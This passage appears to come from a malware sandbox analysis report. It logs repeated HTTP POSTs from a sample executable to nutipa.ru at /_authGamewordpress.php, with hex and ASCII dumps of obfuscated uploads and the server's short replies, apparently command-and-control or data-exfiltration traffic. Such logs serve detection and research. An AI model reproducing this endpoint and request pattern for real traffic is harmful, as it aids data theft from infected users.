                                                            Data Raw: 39 38 0d 0a 06 1f 3a 03 35 14 2a 1e 34 00 3f 0b 2e 3c 03 1b 29 30 20 41 26 32 2d 1d 33 38 2c 07 29 13 01 1f 32 17 3d 11 23 0b 35 50 3c 09 21 12 24 36 21 51 03 11 21 00 25 00 3f 03 3d 39 06 19 32 1f 2b 14 25 13 2c 5f 3f 06 08 57 27 3b 3f 1e 20 3e 27 09 2e 14 02 1f 3c 2a 2b 16 2f 3e 36 1d 20 1c 2e 53 0c 17 25 1e 2b 07 2a 5f 23 32 17 51 30 2f 23 54 34 39 03 0c 3d 20 3f 0d 24 33 05 53 33 00 20 1a 20 33 25 52 31 03 36 13 34 32 00 50 2a 18 25 5c 20 05 2e 52 03 34 5d 54 0d 0a
                                                            Data Ascii: 98:5*4?.<)0 A&2-38,)2=#5P<!$6!Q!%?=92+%,_?W';? >'.<*+/>6 .S%+*_#2Q0/#T49= ?$3S3 3%R1642P*%\ .R4]T
                                                            Dec 15, 2024 19:37:19.321634054 CET5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            44192.168.2.449808104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:18.809355021 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:19.154647112 CET2536OUTData Raw: 50 5e 46 5b 5a 5d 58 53 5d 5a 56 51 50 5b 57 50 55 55 5e 46 5a 50 5b 5f 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: P^F[Z]XS]ZVQP[WPUU^FZP[_\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'?&Y);]#?5++4<$'.%*)U 3>%<3R/;.F'#P +
                                                            Dec 15, 2024 19:37:19.897706985 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:20.135431051 CET796INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:19 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JwkqHLNixj2NuQO0mR1HBLwVYzTxaMsZO%2BTMfz%2Faf40VH47KchT4vQLAezKEVrwgbht0OEZDYnveqm8x1%2F1aDVJtOB7K0NIOUXCVEC3nuZnLW6ZAEWkfK28ip%2BM%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b566d2a5e64-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4664&min_rtt=1688&rtt_var=6585&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=57263&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            45192.168.2.449809104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:20.787034988 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:21.139128923 CET2536OUTData Raw: 50 53 43 51 5a 5b 58 57 5d 5a 56 51 50 5b 57 57 55 54 5e 41 5a 57 5b 5f 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PSCQZ[XW]ZVQP[WWUT^AZW[_\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$^?2_= ",6E+] 2=:Y&>30..+U&/;.F'#P +
                                                            Dec 15, 2024 19:37:21.874476910 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:22.114371061 CET794INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:21 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EqCF%2BD00SJkac9Z52b6lwV4gImMQF6XsuRS7DGi%2FBk68NGRmjOLla4kImVLCoXS%2BAQnuraEIKvrlp49QVuf3i86ZDEMQ5h3Ri7XB80oONGtJ7CvesdPjs6bcL7M%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b62b85042bc-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3939&min_rtt=1749&rtt_var=5036&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=75757&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            46192.168.2.449810104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:22.369469881 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:22.716738939 CET2536OUTData Raw: 55 50 46 5a 5f 5f 5d 52 5d 5a 56 51 50 5a 57 5b 55 51 5e 49 5a 55 5b 5a 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UPFZ__]R]ZVQPZW[UQ^IZU[Z\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$[+-2Z>\'Y5*A(-X ?$Y'="X%=<'>)(0%;;.F'#P /
                                                            Dec 15, 2024 19:37:23.494529963 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:23.710345030 CET789INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:23 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JFX0EkFzdBl4SKec79b%2B5sIrJiQUFPtmeTIp8d2g6hJpIUkxpcOkeQ0DuVRB346s%2FRNVvhnyaQ%2FI7QzgM6OJc77MevXqtNe4x8vCFSE1J1Cbm6KmYiLQ7W9fywc%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b6caf8cf3bb-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=8382&min_rtt=1592&rtt_var=14177&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=26111&cwnd=79&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a
                                                            Data Ascii: 44W@T
                                                            Dec 15, 2024 19:37:23.902086020 CET5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            47192.168.2.449811104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:24.303513050 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:24.654412985 CET2536OUTData Raw: 50 51 43 5d 5f 58 58 51 5d 5a 56 51 50 51 57 5b 55 54 5e 40 5a 50 5b 52 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PQC]_XXQ]ZVQPQW[UT^@ZP[R\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'<-.[) "-?4<([1"_2->);'=>_<!,+.F'#P
                                                            Dec 15, 2024 19:37:25.389305115 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:25.662014008 CET792INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:25 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ux7pVJ11ewIlEjjVcr6Vu%2BQYEmqlHQitrN5Rr0OKInD1ITpSDRt2qFf6fprRaWbnzN2ped4uFjIJCS%2F5unsRgmyocRlj8gJxYoVuzVTKEgL5H1F05mibeA6PLy4%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b78ba0f4405-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3700&min_rtt=1631&rtt_var=4751&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=80272&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            48192.168.2.449812104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:24.447607994 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:24.795104980 CET1420OUTData Raw: 55 57 43 51 5f 5b 5d 55 5d 5a 56 51 50 5e 57 5a 55 51 5e 45 5a 56 5b 5d 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UWCQ_[]U]ZVQP^WZUQ^EZV[]\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'(_=: 6%?;\ 8Y1X2'-!V>[%.&+3%;;.F'#P ?
                                                            Dec 15, 2024 19:37:25.534591913 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:25.789246082 CET942INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:25 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cderPiwB%2FqNWqshS5hdKjb7jtHtA34TNa04cVskjP%2FI2JvnUlp2Rg2zF1H6SPLQ0DwrJ3ot7uDv8no8C8FbtEjanW9Xhio7Sy9Gk7gYYoIKJh8xMna9teX47LVA%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b79af3943bf-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7187&min_rtt=1852&rtt_var=11365&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1716&delivery_rate=32782&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 3a 03 35 39 22 52 20 3e 02 1b 2c 3f 32 0f 2b 30 3f 1a 33 32 39 5a 30 3b 3f 1b 28 3d 2b 52 25 17 03 5e 23 1c 26 08 2b 24 31 5b 24 26 21 51 03 11 22 58 26 10 02 10 2a 5f 37 04 24 21 0d 5a 26 13 38 14 2b 28 35 0f 33 06 27 10 20 3e 37 0f 3a 5c 38 58 2b 03 2f 5a 3a 00 26 55 21 26 2e 53 0c 17 25 1e 2b 17 0c 5b 37 32 17 1e 27 3f 3b 1f 23 17 22 54 3d 55 23 09 30 33 23 54 24 58 38 57 21 33 25 56 24 39 31 03 23 0c 0b 0f 2a 18 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 98:59"R >,?2+0?329Z0;?(=+R%^#&+$1[$&!Q"X&*_7$!Z&8+(53' >7:\8X+/Z:&U!&.S%+[72'?;#"T=U#03#T$X8W!3%V$91#*%\ .R4]T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            49192.168.2.449813104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:25.921802044 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:26.279258013 CET2536OUTData Raw: 55 50 46 5b 5a 5b 5d 56 5d 5a 56 51 50 5c 57 56 55 5c 5e 43 5a 5e 5b 5b 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UPF[Z[]V]ZVQP\WVU\^CZ^[[\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'+)*:!Z:<=3Z44%>'=-W)3\< &;;.F'#P 7
                                                            Dec 15, 2024 19:37:27.012936115 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:27.316521883 CET794INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:27 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0mgnhvvmSo5lqHo7%2F0f1Q77PRsTDEnGM5NxrpqZoIvlOtwA2SljmlqHRzARx8%2Bd96JipudeAhR0PT9C5vEJz6vdPwGm27iDuLVZLeVUMpKuD0je2H%2BixJsMEfmA%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b82ec0443d3-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3881&min_rtt=1671&rtt_var=5047&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=75440&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            50192.168.2.449814104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:27.568474054 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:27.919883966 CET2536OUTData Raw: 50 52 43 50 5f 5e 58 51 5d 5a 56 51 50 59 57 57 55 5d 5e 42 5a 57 5b 5a 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PRCP_^XQ]ZVQPYWWU]^BZW[Z\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$]<)=);X6<C+-#7<$Y2-%>=*3Y'"(#*8+.F'#P #
                                                            Dec 15, 2024 19:37:28.671375036 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:28.973556042 CET792INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:28 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B0RA3vNo7tuvztVPy6rKelsBqCCrMfXYo9oO46gbh4HlZ29eCHRUEC1A%2FIN96mzFG5Q6PP%2BJjKylThsAd2Db8AxE3UXuUGDzfvz5q5AVviLyk638lIjbEwDPPfM%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b8d384042a5-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3670&min_rtt=1727&rtt_var=4534&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=84520&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            51192.168.2.449815104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:29.213779926 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:29.560817003 CET2536OUTData Raw: 55 55 46 5c 5f 5f 58 57 5d 5a 56 51 50 5c 57 56 55 56 5e 48 5a 55 5b 53 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UUF\__XW]ZVQP\WVUV^HZU[S\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$?)=*"@(>07$\%.:\1>>0,3X5(#!V/.F'#P 7
                                                            Dec 15, 2024 19:37:30.306015968 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:30.566747904 CET795INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:30 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Slev0DmFUZL3SbQWf649KsRPc517%2BifvSApzIAzi8GoeDZV4pSsg1WEbg4EONK0mqdtTDynH%2BK9XbHJGo0ukadtjVRn6D%2Bh0t3HkNGvM2s4IEcFYZpj0pV83h8%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288b977f2e43af-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=9152&min_rtt=2483&rtt_var=14269&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=26148&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            52192.168.2.449816104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:30.810620070 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:31.169913054 CET2536OUTData Raw: 50 52 46 5d 5f 57 5d 53 5d 5a 56 51 50 5b 57 50 55 51 5e 41 5a 52 5b 52 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PRF]_W]S]ZVQP[WPUQ^AZR[R\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$]([=\8"!+-Z!<4Y2-2&9T>3[$X&(3%,+.F'#P +
                                                            Dec 15, 2024 19:37:31.904314995 CET25INHTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:32.139972925 CET794INHTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:31 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3XgQed0PSrKLlpjSy%2F5Xt4wgKm5RZEMcUtQymzOjPxGy08UFY%2FpzxRlBd%2FchnGJLC2HZLN3S6DZvJ2mwyPRRp1W5O5hnDgMOYZfdIIqMkNN3gAbxK6Y1iGYr2A0%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288ba17826c431-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3673&min_rtt=1564&rtt_var=4806&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=79162&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            53192.168.2.449817104.21.64.130807956C:\Users\user\Desktop\150bIjWiGH.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 15, 2024 19:37:30.920572996 CET296OUTPOST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:31.279267073 CET1420OUTData Raw: 50 55 43 5b 5f 5c 58 5e 5d 5a 56 51 50 5d 57 50 55 52 5e 46 5a 56 5b 5a 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
